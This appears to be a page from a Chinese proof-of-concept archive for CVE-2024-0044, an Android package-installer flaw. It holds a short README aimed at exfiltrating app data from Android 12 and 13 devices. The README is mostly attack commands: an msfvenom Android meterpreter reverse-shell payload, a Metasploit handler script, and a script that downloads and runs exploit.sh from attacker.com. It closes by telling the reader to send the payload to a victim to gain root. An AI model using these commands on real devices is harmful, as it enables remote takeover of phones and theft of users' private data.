关联漏洞
标题:
Google Android 安全漏洞
(CVE-2024-0044)
描述:Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。 Google Android 存在安全漏洞,该漏洞源于 PackageInstallerService.java 文件的 createSessionInternal 方法存在输入验证不当,可能会以任何应用程序的方式运行。
描述
Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability remotely
介绍
# Android Autorooter
This is just a mental note more than anything to further explore the posibilities of the work done here:
https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html
https://tinyhack.com/2024/06/07/extracting-whatsapp-database-or-any-app-data-from-android-12-13-using-cve-2024-0044/?s=03
https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/
Ultimately I'd like to have a self executing exploit but babysteps yeah..
## Give this a try
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk
```
Create a resource script execute_script.rc to automate the commands:
```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc
```
Create the resource script with the necessary commands:
```
cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh
```
Start Metasploit with the resource script:
```
msfconsole -r execute_script.rc
```
Get the party started with:
```
msfconsole -r execute_script.rc
```
Now your listener/payload delivery is set up... Send that payload.apk to the victim.. Lets get some root baby
文件快照
[4.0K] /data/pocs/16939b066184141a46a9210e375fb4c9a7827449
├── [ 103] commands.rc
├── [ 215] execute_script.rc
├── [ 913] exploit.sh
└── [1.3K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。